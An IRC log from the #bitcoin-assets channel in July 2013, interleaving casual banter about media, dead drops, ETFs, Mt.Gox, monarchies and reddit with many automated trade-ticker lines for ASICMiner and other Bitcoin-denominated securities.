inters of vice/forbes/etc actually thinks that "pro marketing" does anything Jul 03 02:54:36 what's the theory, whether i buy them a subway or not makes or breaks the business, is that it ? Jul 03 02:54:56 it does one particular thing: bring in the idiot chumps Jul 03 02:55:27 you just stated the goal of marketing nowadays Jul 03 02:56:25 also have to wonder how much LTC the operator holds Jul 03 02:56:25 i kinda doubt it,but anyway. Jul 03 02:56:34 i mean sure, in the 80s it used to. even in the 90s, maybe Jul 03 02:56:52 it's 2013. who the fuck do you think acts upon or even cares what "vice" says Jul 03 02:58:13 this is like telling me that a well chosen weather vane attracts the afids. dude... the afids can't fly, and the ants are keeping them pretty well tied down. what vane. Jul 03 02:58:15 [HAVELOCK] [ASICM] 52 @ 0.04699999 = 2.444 BTC [-] Jul 03 02:58:20 the only reason I find this tidbit interesting is that it is yet another example of chumps who think that 'encryption' will save them - without having anything resembling a secure endpoint. Jul 03 02:58:25 has vice been around since longer than 2012? Jul 03 02:58:44 Bugpowder i think their pro marketing campaign of themselves started cca 2011 Jul 03 02:58:53 I don't remember reading anything from then before about a year ago, and then they were just killing it with pretty cool stories Jul 03 02:59:02 Mcaffee embed Jul 03 02:59:08 etc Jul 03 02:59:31 wait, that is not vice.com Jul 03 02:59:51 took you a minute Jul 03 02:59:55 obvously the pro marketing works. Jul 03 03:00:34 asciilifeform well kinda difficult to implement us mail dead drops. Jul 03 03:00:38 Founded by Suroosh Alvi, Shane Smith, and Gavin McInnes, the magazine was launched in 1994 as the Voice of Montreal with government funding, and the intention of the founders was to provide work and a community service.[5 Jul 03 03:00:46 I guess it was just a mag Jul 03 03:01:25 mircea_popescu: old-fashioned dead drops a la Aldrich Ames work fine. Jul 03 03:01:31 man I am out o da loop Jul 03 03:01:46 Bugpowder that's because you have a girlfriend. Jul 03 03:01:48 [BTCTC] [AMC-PT] 32 @ 0.0021 = 0.0672 BTC [+] Jul 03 03:02:10 All my bitcoin defense comments on the DealBook story on the WinklETF are not getting the recommendations I had hoped Jul 03 03:02:17 so many haters on NYT! Jul 03 03:02:25 I guess they are bitter they missed the 2nd bubble Jul 03 03:02:30 is thatg the guy who spent like his yearly salary each month Jul 03 03:02:33 ON HIS CREDIT CARD ? Jul 03 03:02:34 back to AAPL with you! Jul 03 03:02:49 mircea_popescu: Correction, wife and child. Jul 03 03:02:54 mircea_popescu: yeah, the very same. Jul 03 03:02:55 Bugpowder possibly it's that they don't buy in the etf ? Jul 03 03:03:21 I think there is just so much negativity associated with Winkelvoxen that it colors the whole affair Jul 03 03:03:24 mircea_popescu: but dead drops work fine 'if used as prescribed'. Jul 03 03:03:33 Bugpowder have you read the fucking thing ?! Jul 03 03:03:48 they have thought of many risk factors! Jul 03 03:03:49 asciilifeform im not sure mail delivers to dead drops. Jul 03 03:03:56 ahahahaha o gawdy Jul 03 03:04:07 this chan is sort of like snl with better iq. Jul 03 03:04:16 mircea_popescu: forget mail, deal locally, use dead drops the old-fashioned way - seller buries, buyer digs. Jul 03 03:04:26 [BTCTC] [ASICMINER-PT] 1 @ 4.958956 BTC [+] Jul 03 03:04:36 asciilifeform you're proposing i go on teh interwebs to meet girls living next door ? Jul 03 03:04:46 genius tyvm i couldn't have just found them on my own. Jul 03 03:04:49 based on like...scent. Jul 03 03:04:57 Their proposal has the advantage of coming from the desk of Kathleen Moriarty, a lawyer at Katten Muchin, who played a leading role in the creation of the first exchange-traded fund and popular gold- and silver-backed E.T.F.’s. Jul 03 03:05:25 mircea_popescu: kinda hard to buy a grenade launcher that way. Jul 03 03:05:26 does it ? Jul 03 03:05:27 [BTCTC] [ASICMINER-PT] 1 @ 4.958958 BTC [+] Jul 03 03:05:33 my favorite part : Before Mt.Gox registered with the Treasury Department’s Financial Crimes Enforcement Network, some of its accounts in the United States were frozen. The company temporarily stopped its American customers from cashing out while it said it was “making improvements.” Jul 03 03:05:43 [BTCTC] [ASICMINER-PT] 1 @ 4.958958 BTC [+] Jul 03 03:05:45 They are still making them.. Jul 03 03:05:58 2 wires from pre-freeze are still vaporware Jul 03 03:06:00 Bugpowder srsly, muchin actually made that thing ? Jul 03 03:06:16 [BTCTC] [ASICMINER-PT] 2 @ 4.958999 = 9.918 BTC [+] Jul 03 03:06:17 [BTCTC] [ASICMINER-PT] 1 @ 4.959 BTC [+] Jul 03 03:06:19 I dunno, I just quote news, I don't make news Jul 03 03:06:19 [BTCTC] [ASICMINER-PT] 5 @ 4.96 = 24.8 BTC [+] Jul 03 03:06:25 [BTCTC] [ASICMINER-PT] 1 @ 4.97 BTC [+] Jul 03 03:06:27 [BTCTC] [ASICMINER-PT] 2 @ 4.979 = 9.958 BTC [+] Jul 03 03:06:29 [BTCTC] [ASICMINER-PT] 1 @ 4.9799 BTC [+] Jul 03 03:06:30 mircea_popescu: at any rate, I was talking about the lack of a secure endpoint for the crypto, rather than the physical, side. Jul 03 03:06:32 [BTCTC] [ASICMINER-PT] 1 @ 4.98 BTC [+] Jul 03 03:06:34 [BTCTC] [ASICMINER-PT] 2 @ 4.988 = 9.976 BTC [+] Jul 03 03:06:36 [BTCTC] [ASICMINER-PT] 1 @ 4.9888 BTC [+] Jul 03 03:06:38 [BTCTC] [ASICMINER-PT] 1 @ 4.9888 BTC [+] Jul 03 03:06:39 fuck you asicminer Jul 03 03:06:39 go go go Jul 03 03:06:41 [BTCTC] [ASICMINER-PT] 1 @ 4.9899 BTC [+] Jul 03 03:06:42 asciilifeform a. well that too. Jul 03 03:06:43 [BTCTC] [ASICMINER-PT] 5 @ 4.9899 = 24.9495 BTC [+] Jul 03 03:06:49 [BTCTC] [ASICMINER-PT] 3 @ 4.99 = 14.97 BTC [+] Jul 03 03:06:55 ok so what next, 10 ? 45 ? Jul 03 03:06:55 [BTCTC] [ASICMINER-PT] 10 @ 4.99 = 49.9 BTC [+] Jul 03 03:06:56 I missed the boat Jul 03 03:06:57 [BTCTC] [ASICMINER-PT] 1 @ 4.99 BTC [+] Jul 03 03:06:59 [BTCTC] [ASICMINER-PT] 1 @ 4.99 BTC [+] Jul 03 03:07:05 oh jezus Jul 03 03:07:05 [BTCTC] [TAT.ASICMINER] 20 @ 0.0489 = 0.978 BTC [+] Jul 03 03:07:06 [BTCTC] [ASICMINER-PT] 1 @ 4.996 BTC [+] Jul 03 03:07:08 [BTCTC] [ASICMINER-PT] 1 @ 4.998 BTC [+] Jul 03 03:07:14 [HAVELOCK] [ASICM] 2 @ 0.04653 = 0.0931 BTC [-] Jul 03 03:07:15 [BTCTC] [ASICMINER-PT] 1 @ 4.9989 BTC [+] Jul 03 03:07:17 [BTCTC] [ASICMINER-PT] 1 @ 4.998999 BTC [+] Jul 03 03:07:18 [HAVELOCK] [ASICM] 100 @ 0.04789897 = 4.7899 BTC [+] Jul 03 03:07:19 [HAVELOCK] [ASICM] 23 @ 0.04789998 = 1.1017 BTC [+] Jul 03 03:07:20 Dealbook should do a story on that fucking bubble Jul 03 03:07:20 [HAVELOCK] [ASICM] 32 @ 0.04789999 = 1.5328 BTC [+] Jul 03 03:07:21 [BTCTC] [ASICMINER-PT] 15 @ 4.999 = 74.985 BTC [+] Jul 03 03:07:21 ThickAsThieves, was your ask bought ? Jul 03 03:07:22 [BTCTC] [ASICMINER-PT] 7 @ 4.9998 = 34.9986 BTC [+] Jul 03 03:07:23 [BTCTC] [ASICMINER-PT] 1 @ 4.9998 BTC [+] Jul 03 03:07:24 [BTCTC] [ASICMINER-PT] 15 @ 4.99999 = 74.9999 BTC [+] Jul 03 03:07:25 [BTCTC] [ASICMINER-PT] 3 @ 4.999999 = 15 BTC [+] Jul 03 03:07:28 [BTCTC] [ASICMINER-PT] 10 @ 5 = 50 BTC [+] Jul 03 03:07:29 [HAVELOCK] [ASICM] 300 @ 0.04789999 = 14.37 BTC [+] Jul 03 03:07:32 [BTCTC] [ASICMINER-PT] 5 @ 5 = 25 BTC [+] Jul 03 03:07:34 [BTCTC] [ASICMINER-PT] 1 @ 5 BTC [+] Jul 03 03:07:34 yeeeuhh Jul 03 03:07:35 [BTCTC] [ASICMINER-PT] 5 @ 5 = 25 BTC [+] Jul 03 03:07:38 [BTCTC] [ASICMINER-PT] 16 @ 5 = 80 BTC [+] Jul 03 03:07:40 [BTCTC] [ASICMINER-PT] 7 @ 5 = 35 BTC [+] Jul 03 03:07:42 [BTCTC] [ASICMINER-PT] 1 @ 5 BTC [+] Jul 03 03:07:47 why stop now Jul 03 03:07:48 [BTCTC] [ASICMINER-PT] 4 @ 4.958958 = 19.8358 BTC [-] Jul 03 03:07:50 nice volumes over there Jul 03 03:07:51 go to 6 Jul 03 03:08:15 [BTCTC] [TAT.ASICMINER] 7 @ 0.048875 = 0.3421 BTC [-] Jul 03 03:08:15 C'mon MP, pump MPOE up some more ) Jul 03 03:08:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.0489 = 0.1467 BTC [+] Jul 03 03:08:18 :) Jul 03 03:08:23 lol Jul 03 03:08:36 when have i ever pumped it ?! Jul 03 03:08:48 what I don't understand about this new investor, is did only 1/3 of his bid get filled? Jul 03 03:08:52 [HAVELOCK] [ASICM] 20 @ 0.04789999 = 0.958 BTC [+] Jul 03 03:08:57 is that the guy sitting with the 31M bid? Jul 03 03:09:00 [HAVELOCK] [ASICM] 5 @ 0.04789999 = 0.2395 BTC [+] Jul 03 03:09:03 or is that something else? Jul 03 03:09:14 [HAVELOCK] [ASICM] 3 @ 0.04652 = 0.1396 BTC [-] Jul 03 03:09:57 Bugpowder: can't win them all mr. bitcoin billionaire Jul 03 03:10:09 Bugpowder: wants more to add to his billions so he can buy more novelty cars Jul 03 03:10:22 Bugpowder hewanted more but didn't want to pay a decent premium for a 10% Jul 03 03:10:37 i guess musta figured getting it on the open market. Jul 03 03:10:51 [BTCTC] [ASICMINER-PT] 33 @ 4.958958 = 163.6456 BTC [-] Jul 03 03:11:44 you should get the rights to seinfeld mircea_popescu so you can make this: http://i.imgur.com/r5qLfDh.jpg Jul 03 03:12:02 s.mg's second game Jul 03 03:12:18 thestringpuller: I just want a nice house in the Palisades Jul 03 03:12:26 yea dude. the rights to a multi billion franchise. i'm getting it Jul 03 03:12:38 mp = http://costumei.com/pictures/2013/05/Kramer-Dressed-In-A-Pimp-Costume-In-Seinfeld.jpg Jul 03 03:13:05 pankkake where's the tie ? Jul 03 03:13:08 [BTCTC] [ASICMINER-PT] 7 @ 4.870019 = 34.0901 BTC [-] Jul 03 03:13:22 [BTCTC] [PAJKA.BOND] 4 @ 0.061997 = 0.248 BTC [+] Jul 03 03:13:25 All my hopes ride on JD now Jul 03 03:13:34 need moar whales Jul 03 03:13:37 [BTCTC] [ASICMINER-PT] 1 @ 4.870014 BTC [-] Jul 03 03:13:42 or Vinka to get less lucky Jul 03 03:13:46 [BTCTC] [BASIC-MINING] 5 @ 0.1795 = 0.8975 BTC [+] Jul 03 03:14:13 He pulled this out of his ass last night... http://i.imgur.com/6n5oUfC.png Jul 03 03:14:16 get this Jul 03 03:14:21 genius scamming at work Jul 03 03:14:23 [BTCTC] [ASICMINER-PT] 3 @ 4.87 = 14.61 BTC [-] Jul 03 03:14:29 [BTCTC] [B.YABMC] 10 @ 0.007989 = 0.0799 BTC [+] Jul 03 03:14:39 it sounds like AMC is gonna IPO their scam company VMC Jul 03 03:14:45 [BTCTC] [ASICMINER-PT] 3 @ 4.85 = 14.55 BTC [-] Jul 03 03:14:48 the one that made AMC partly worthless Jul 03 03:14:56 due to contrcat Jul 03 03:15:21 ThickAsThieves i hope valuation over 2m. Jul 03 03:15:25 gotta keep up. Jul 03 03:15:32 [BTCTC] [ASICMINER-PT] 3 @ 4.84 = 14.52 BTC [-] Jul 03 03:16:01 So 90% of all bitcoins are minted in china Jul 03 03:16:04 just like everything else Jul 03 03:16:07 awesome Jul 03 03:16:13 next step, they will issue shares for more than there are bitcoins in existence Jul 03 03:16:21 [BTCTC] [COGNITIVE] 8 @ 0.389966 = 3.1197 BTC [+] Jul 03 03:16:31 ThickAsThieves: VMC and AMC are joining into one Jul 03 03:17:14 following the AM model +/- Jul 03 03:17:39 vbs what do you mean the am model ? Jul 03 03:17:55 rises in value Jul 03 03:18:12 thestringpuller http://trilema.com/2013/the-future-of-bitcoin-regulation/ Jul 03 03:18:15 mining and selling hardware, all under the same hat Jul 03 03:18:23 americans have lousy goals. houses in the palisades and whatnot. Jul 03 03:18:31 the world belongs to those who aim to take it over. Jul 03 03:18:44 [BTCTC] [AMC-PT] 2 @ 0.0021 = 0.0042 BTC [+] Jul 03 03:18:59 [BTCTC] [BASIC-MINING] 10 @ 0.170003 = 1.7 BTC [-] Jul 03 03:19:00 [BTCTC] [BASIC-MINING] 4 @ 0.170002 = 0.68 BTC [-] Jul 03 03:19:02 [BTCTC] [BASIC-MINING] 7 @ 0.17 = 1.19 BTC [-] Jul 03 03:19:03 [BTCTC] [BASIC-MINING] 5 @ 0.17 = 0.85 BTC [-] Jul 03 03:19:05 [BTCTC] [BASIC-MINING] 8 @ 0.168 = 1.344 BTC [-] Jul 03 03:19:06 [BTCTC] [BASIC-MINING] 5 @ 0.165666 = 0.8283 BTC [-] Jul 03 03:19:08 [BTCTC] [BASIC-MINING] 1 @ 0.16566 BTC [-] Jul 03 03:20:45 [BTCTC] [ASICMINER-PT] 3 @ 4.84 = 14.52 BTC [-] Jul 03 03:21:03 AMC shares will be traded to VMC shares 1:1, with an expected total number of VMC shares much less than AMC now Jul 03 03:21:25 okay, so they're trying to prop the price pulling a gigavps Jul 03 03:21:27 mircea_popescu: why is that directed at me? Jul 03 03:21:33 Is it because I'm for regulation! Jul 03 03:21:37 I'm a supah liberal! Jul 03 03:21:39 cause you were pointing out 90% in china Jul 03 03:21:43 REGULATE THE BANKS Jul 03 03:21:44 lol Jul 03 03:21:52 REGULATE MIRCEA POPESCU Jul 03 03:21:55 HE'S TOO BIG TO FAIL Jul 03 03:22:25 mircea_popescu: I hope not :P Jul 03 03:22:27 heh Jul 03 03:22:56 Vbs this is the thing that ipo'd at 8 then re-ipo'd at 25 for no apparent reason or am i confusing my obscure scamsets Jul 03 03:23:33 lol yes Jul 03 03:23:37 ipo'd at 5 actually Jul 03 03:23:40 pumped to 8 Jul 03 03:23:55 well what could possibly go wrong. Jul 03 03:24:26 [BTCTC] [ASICMINER-PT] 7 @ 4.986997 = 34.909 BTC [+] Jul 03 03:24:38 [BTCTC] [DMS.SELLING] 2 @ 0.03029 = 0.0606 BTC [+] Jul 03 03:25:05 [BTCTC] [AMC-PT] 5 @ 0.0021 = 0.0105 BTC [+] Jul 03 03:26:45 what are we talking about again Jul 03 03:26:54 I'm behind on my scam investment portfolio Jul 03 03:27:19 [BTCTC] [ASICMINER-PT] 2 @ 4.987 = 9.974 BTC [+] Jul 03 03:28:15 [BTCTC] [ASICMINER-PT] 3 @ 4.987 = 14.961 BTC [+] Jul 03 03:28:19 [BTCTC] [AMC-PT] 245 @ 0.0021 = 0.5145 BTC [+] Jul 03 03:29:14 [BTCTC] [ASICMINER-PT] 3 @ 4.987 = 14.961 BTC [+] Jul 03 03:29:59 [BTCTC] [AMC-PT] 3 @ 0.0021 = 0.0063 BTC [+] Jul 03 03:30:20 [BTCTC] [ASICMINER-PT] 1 @ 4.988998 BTC [+] Jul 03 03:30:26 [BTCTC] [ASICMINER-PT] 1 @ 4.989 BTC [+] Jul 03 03:30:29 [BTCTC] [ASICMINER-PT] 1 @ 4.99 BTC [+] Jul 03 03:30:58 [BTCTC] [AMC-PT] 395 @ 0.0021 = 0.8295 BTC [+] Jul 03 03:31:22 [BTCTC] [TAT.ASICMINER] 35 @ 0.049199 = 1.722 BTC [+] Jul 03 03:33:58 [MPEX] [S.MPOE] 2350 @ 0.00082615 = 1.9415 BTC [-] Jul 03 03:34:14 [HAVELOCK] [ASICM] 3 @ 0.04789 = 0.1437 BTC [+] Jul 03 03:34:16 [HAVELOCK] [SDICE] 2 @ 0.195 = 0.39 BTC [+] Jul 03 03:35:01 [BTCTC] [ASICMINER-PT] 1 @ 4.989 BTC [-] Jul 03 03:35:22 [BTCTC] [GSDPT] 1 @ 0.00238 BTC [+] Jul 03 03:35:37 [BTCTC] [AMC-PT] 1 @ 0.0021 BTC [+] Jul 03 03:36:25 [BTCTC] [S.BBET-PT] 1 @ 0.0019 BTC [-] Jul 03 03:37:17 [BTCTC] [AMC-PT] 10 @ 0.00215 = 0.0215 BTC [+] Jul 03 03:37:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.04875 = 0.0975 BTC [-] Jul 03 03:38:00 [BTCTC] [S.MPOE-PT] 2 @ 0.001 = 0.002 BTC [+] Jul 03 03:38:35 [BTCTC] [TAT.ASICMINER] 54 @ 0.048401 = 2.6137 BTC [-] Jul 03 03:38:49 [BTCTC] [TAT.ASICMINER] 19 @ 0.04875 = 0.9263 BTC [+] Jul 03 03:40:16 [BTCTC] [AMC-PT] 4 @ 0.0021 = 0.0084 BTC [-] Jul 03 03:40:20 [BTCTC] [TAT.ASICMINER] 68 @ 0.0492 = 3.3456 BTC [+] Jul 03 03:40:37 [BTCTC] [TAT.ASICMINER] 20 @ 0.0492 = 0.984 BTC [+] Jul 03 03:41:33 [HAVELOCK] [ASICM] 29 @ 0.04789999 = 1.3891 BTC [+] Jul 03 03:42:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.048402 BTC [-] Jul 03 03:42:09 [BTCTC] [TAT.ASICMINER] 20 @ 0.0492 = 0.984 BTC [+] Jul 03 03:42:33 [BTCTC] [ASICMINER-PT] 1 @ 4.989 BTC [-] Jul 03 03:43:16 [BTCTC] [AMC-PT] 29 @ 0.0021 = 0.0609 BTC [-] Jul 03 03:45:30 [BTCTC] [TAT.ASICMINER] 8 @ 0.049299 = 0.3944 BTC [+] Jul 03 03:45:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.049299 = 0.0986 BTC [+] Jul 03 03:46:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0493 BTC [+] Jul 03 03:47:24 [BTCTC] [ASICMINER-PT] 1 @ 4.989 BTC [-] Jul 03 03:50:53 [HAVELOCK] [ASICM] 114 @ 0.04789999 = 5.4606 BTC [+] Jul 03 03:53:20 [HAVELOCK] [ASICM] 298 @ 0.0479 = 14.2742 BTC [+] Jul 03 03:54:01 [BTCTC] [ASICMINER-PT] 1 @ 4.989 BTC [-] Jul 03 03:56:00 [BTCTC] [ASICMINER-PT] 5 @ 4.99 = 24.95 BTC [+] Jul 03 04:00:22 [BTCTC] [TAT.ASICMINER] 14 @ 0.0493 = 0.6902 BTC [+] Jul 03 04:00:30 o/ Jul 03 04:00:33 [HAVELOCK] [KCIM] 1 @ 0.8622 BTC [-] Jul 03 04:00:49 [HAVELOCK] [KCIM] 2 @ 0.6 = 1.2 BTC [-] Jul 03 04:02:19 [HAVELOCK] [ASICM] 107 @ 0.0479 = 5.1253 BTC [+] Jul 03 04:03:27 hahaha @ nick ;) Jul 03 04:05:18 [HAVELOCK] [ASICM] 453 @ 0.0479 = 21.6987 BTC [+] Jul 03 04:07:23 mod6_: you around? Jul 03 04:07:41 matthew_boyd: who's nick? Jul 03 04:07:53 Thickerthantheives ;) Jul 03 04:07:58 o/ Chaaang-Noi! Jul 03 04:08:18 Chaaang-Noi: the crypto king of thailand Jul 03 04:08:43 then you can pay the police off Jul 03 04:08:48 for 1 bitcoin Jul 03 04:08:52 Blasphemy ;) Jul 03 04:09:07 Are there any restrictions internet wise over there? Jul 03 04:09:08 you could, but they'd need to know wtf you were talking about beforehand Jul 03 04:09:28 could you buy your way into the king-ship? Jul 03 04:09:42 do some game of thrones shit? Jul 03 04:09:56 he didn't write that because death Jul 03 04:10:07 oh wow Jul 03 04:10:12 Chaaang-Noi: you don't know me, nor do I know you that well, however I had a dream about you last night! : P Jul 03 04:10:24 matt, don't creep. Jul 03 04:10:55 goat r u rdy to sell at 3.5 yet? Jul 03 04:10:56 Chaaang-Noi: so could you pay off King Adulyadej? Jul 03 04:11:12 O.o Jul 03 04:11:21 don't tell anyone about the garr dream. that'll get you arrested in the us Jul 03 04:11:27 davos: it wasn't bad, it was that there was a meet up in my town and he flew from Thailand to be apart of it! Jul 03 04:12:19 whoa Jul 03 04:12:20 btw meetups aren't regular in my town, as in there is none at all, so it was significant! Jul 03 04:12:24 70 billion? Jul 03 04:12:29 that's more than bill gates Jul 03 04:12:40 you think the us parses dreams like that? you're not even allowed to think about <18s after you're 21. its the law. Jul 03 04:12:46 thestringpuller: sup Jul 03 04:13:10 thestringpuller: it helps when your assets include an entire country and all of its people Jul 03 04:13:33 this is why forbes doesn't include absolute monarchs Jul 03 04:14:20 dude I love this channel Jul 03 04:14:24 I wanna be a king!!! Jul 03 04:14:33 I WANT TO BE PHAROH Jul 03 04:14:36 Chaaang-Noi: not too bad, eh? ;) Jul 03 04:14:54 mod6: mah homie from another crony Jul 03 04:15:19 pfft. i love how the british crown still owns 80% of the landmass of britain and the gov't can't disown it because it would require negating all property law in the UK... this is why there is still a monarch in Britain. Jul 03 04:15:19 :D Jul 03 04:16:30 'eminent domain' is leased to the UK government by the crown for a pittance. hilarity Jul 03 04:16:43 davos: you seem to know a lot about monarch law Jul 03 04:16:46 why is that? Jul 03 04:16:51 its fascinating Jul 03 04:17:03 question Chaaang-Noi, what's with the big spaces? Jul 03 04:17:09 i like to think of it as knowning a lot about property law Jul 03 04:17:20 and internationally, property law IS monarch law Jul 03 04:17:39 what client are you using? Jul 03 04:17:52 is there a country that is an absolute monarchy but has hardcore capitalsim? Jul 03 04:17:58 hahahaha, all right :D Jul 03 04:18:02 singapore? Jul 03 04:18:12 hmm Jul 03 04:18:25 fair enough Jul 03 04:18:31 http://webchat.freenode.net/?channels=#bitcoin-assets Jul 03 04:18:36 Chaaang-Noi: Jul 03 04:18:38 singapore is parlimentary :( Jul 03 04:18:44 try again davos Jul 03 04:18:50 we'll find one Jul 03 04:19:01 yeah. i'm about to move there Jul 03 04:19:02 no cap gains Jul 03 04:19:05 what about S.A.? Jul 03 04:19:21 i was thinking about moving there and then opening a series of PTs for public companies on BF Jul 03 04:19:21 what's S.A.? Jul 03 04:19:31 Saudi Arabia Jul 03 04:19:31 PT's BF? Jul 03 04:19:41 passthrrough - bitfunder Jul 03 04:19:47 oh Saudi Arabia that's a good one lemme check Jul 03 04:20:14 !ticker h asicm Jul 03 04:20:14 saudi arabia is a constitional monarchy that just also happens to have a very strong executive/crown Jul 03 04:20:16 ding ding ding Jul 03 04:20:18 https://en.wikipedia.org/wiki/Saudi_Arabia Jul 03 04:20:22 oh where, oh where has assbot gone Jul 03 04:20:23 bhutan is a big one Jul 03 04:20:23 oh Jul 03 04:20:27 or where oh where can he be Jul 03 04:20:29 davos why you kill my dreams Jul 03 04:20:35 there are only a couple actual absolutes Jul 03 04:20:45 kakobrekla: fix it fix it fix it fix it Jul 03 04:21:46 i don't think the market as it stand right now is all that ripe for a BTC passthrough for a USD denominated stock. You'd have to pair it with a USD etf to allow people to long/short -- except none of the exchanges offer shorts. Jul 03 04:22:04 kakobrekla: http://youtu.be/1lsjgc0oX0s Jul 03 04:22:41 davos if you could get more liquidity on campbx they have margin built in Jul 03 04:23:06 yeah. can you imagine how slow cbx would be with more people? Jul 03 04:23:19 the margin thing is a joke because it would take infinity to load the page at that volume Jul 03 04:23:26 I mean yea. but they are much better than MtGox Jul 03 04:23:33 come on davos give em a break Jul 03 04:23:38 the owner does 90% of the programming Jul 03 04:23:41 and they have 2 interns Jul 03 04:23:53 there office is the size of my apartment Jul 03 04:23:56 their* Jul 03 04:23:57 lol Jul 03 04:24:12 yay Jul 03 04:24:20 !ticker m ^oix Jul 03 04:24:21 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 60.4706933 / 61.22001468 / 114.42277287 (1550 shares, 855.98 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Jul 03 04:24:23 [BTCTC] [AMC-PT] 500 @ 0.00241 = 1.205 BTC [+] Jul 03 04:24:24 [BTCTC] [AMC-PT] 5000 @ 0.002429 = 12.145 BTC [+] Jul 03 04:24:28 oh wow Jul 03 04:24:31 mark is basically the only programmer at gox Jul 03 04:24:35 [BTCTC] [ASICMINER-PT] 1 @ 5.012 BTC [+] Jul 03 04:24:43 gox was pretty slow too Jul 03 04:24:45 err is* Jul 03 04:25:03 well they're still running on the same engine they've been using forever Jul 03 04:25:09 they're next revision is huge Jul 03 04:25:21 their* Jul 03 04:26:00 [BTCTC] [BASIC-MINING] 10 @ 0.176999 = 1.77 BTC [+] Jul 03 04:26:02 [BTCTC] [BASIC-MINING] 4 @ 0.177 = 0.708 BTC [+] Jul 03 04:26:04 [BTCTC] [BASIC-MINING] 3 @ 0.17995 = 0.5399 BTC [+] Jul 03 04:26:05 [BTCTC] [BASIC-MINING] 10 @ 0.179998 = 1.8 BTC [+] Jul 03 04:26:05 if you could trade gox it would be inside info. their next revision jumps them from 30tx/sec to like 100,000,000tx/sec Jul 03 04:26:06 [BTCTC] [BASIC-MINING] 28 @ 0.18 = 5.04 BTC [+] Jul 03 04:26:25 [BTCTC] [AMC-PT] 10 @ 0.00248 = 0.0248 BTC [+] Jul 03 04:28:40 o/ Jul 03 04:29:03 So you were saying asic miner shares hit 5? Jul 03 04:29:16 [BTCTC] [TAT.ASICMINER] 76 @ 0.049498 = 3.7618 BTC [+] Jul 03 04:29:17 [BTCTC] [TAT.ASICMINER] 30 @ 0.0495 = 1.485 BTC [+] Jul 03 04:29:19 [BTCTC] [TAT.ASICMINER] 50 @ 0.0495 = 2.475 BTC [+] Jul 03 04:29:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.049595 = 0.0992 BTC [+] Jul 03 04:29:21 [BTCTC] [TAT.ASICMINER] 40 @ 0.049597 = 1.9839 BTC [+] Jul 03 04:29:22 that'll be nice. but from here it'll be sorta meh. Jul 03 04:29:23 [BTCTC] [TAT.ASICMINER] 60 @ 0.049599 = 2.9759 BTC [+] Jul 03 04:29:24 [BTCTC] [TAT.ASICMINER] 20 @ 0.0496 = 0.992 BTC [+] Jul 03 04:29:37 [BTCTC] [ASICMINER-PT] 3 @ 4.950005 = 14.85 BTC [-] Jul 03 04:29:41 that was amusing Jul 03 04:29:49 its what you get for putting a wall beneath btct Jul 03 04:30:04 [BTCTC] [DMS.MINING] 3 @ 0.0205 = 0.0615 BTC [+] Jul 03 04:30:06 [BTCTC] [DMS.MINING] 130 @ 0.0207 = 2.691 BTC [+] Jul 03 04:30:07 [BTCTC] [DMS.MINING] 5 @ 0.02075 = 0.1038 BTC [+] Jul 03 04:30:08 [BTCTC] [DMS.MINING] 16 @ 0.020899 = 0.3344 BTC [+] Jul 03 04:30:10 [BTCTC] [DMS.MINING] 51 @ 0.0209 = 1.0659 BTC [+] Jul 03 04:30:17 That would mean that I would have an all time high bitcoin total of: Jul 03 04:30:22 11 bitcoins :D Jul 03 04:30:28 ... Jul 03 04:30:46 i assume you're not counting the reddit tips for the website? Jul 03 04:30:48 usagi still got my 21 btc Jul 03 04:30:49 lol Jul 03 04:30:58 i have an all time high of like 50 bitcoins Jul 03 04:31:02 but I spent them bitches Jul 03 04:31:08 CAUSE I WAS TOLD NOT TO HOARD Jul 03 04:31:19 [BTCTC] [AMC-PT] 100 @ 0.00248 = 0.248 BTC [+] Jul 03 04:31:24 davos: they aren't mine, they belong to the sub-reddit :D Jul 03 04:31:29 fair play Jul 03 04:31:43 i hope you're saving them to upgrade the subreddit software. Jul 03 04:32:06 mircea_popescu: software doesn't really exist seeing that it is reddit Jul 03 04:32:11 improvements, yes! Jul 03 04:32:16 reddit is what you want for forum shit under maybe 1k users Jul 03 04:32:18 If you have any input tell me! Jul 03 04:32:20 you missed the theymos reference. Jul 03 04:32:30 Haha Jul 03 04:32:40 Sorry, I am not the most active on bitcointalk :P Jul 03 04:32:41 [BTCTC] [TAT.ASICMINER] 7 @ 0.0498 = 0.3486 BTC [+] Jul 03 04:32:54 I did see the post where they didn't declare their funds though Jul 03 04:32:54 i;m not there at all, but the funny shit percolates Jul 03 04:33:08 http://www.scribd.com/doc/151346841/Bitcoin-Foundation-Response-to-California-DFI Jul 03 04:33:23 saw that. its interesting but obvious Jul 03 04:33:32 [BTCTC] [TAT.ASICMINER] 18 @ 0.0498 = 0.8964 BTC [+] Jul 03 04:33:34 [BTCTC] [TAT.ASICMINER] 3 @ 0.0499 = 0.1497 BTC [+] Jul 03 04:33:36 [BTCTC] [TAT.ASICMINER] 20 @ 0.049996 = 0.9999 BTC [+] Jul 03 04:33:37 [BTCTC] [TAT.ASICMINER] 24 @ 0.049997 = 1.1999 BTC [+] Jul 03 04:33:48 Chaaang-Noi: You totally need to get Reddit man! Jul 03 04:34:09 I would be more than happy to show you the ropes (if there are any to get!) :) Jul 03 04:34:29 its only half theymos's fault. the other half is the run up. Jul 03 04:35:15 Totally! 2 second sign up, and they never ever email you! Jul 03 04:35:38 Of course your sub-reddits would be; /r/Bitcoin, /r/BitcoinStocks, /r/Bitcoinmarkets Jul 03 04:35:59 And if needed to hire someone: /r/Jobs4Bitcoins - shameless self-plug! Jul 03 04:36:32 We represent the Bitcoin Foundation and write in response to your office's May 30, 2013 Jul 03 04:36:32 warning letter. Although that letter requested a written response within twenty days, you Jul 03 04:36:32 confirmed via email on June 25, 2013 that you would extend the Bitcoin Foundation's response Jul 03 04:36:32 deadline. Jul 03 04:36:35 so much win Jul 03 04:39:38 [BTCTC] [ASICMINER-PT] 3 @ 5.008998 = 15.027 BTC [+] Jul 03 04:39:40 [BTCTC] [ASICMINER-PT] 2 @ 5.009 = 10.018 BTC [+] Jul 03 04:40:18 [BTCTC] [TAT.ASICMINER] 47 @ 0.049997 = 2.3499 BTC [+] Jul 03 04:40:20 [BTCTC] [ASICMINER-PT] 7 @ 5.01 = 35.07 BTC [+] 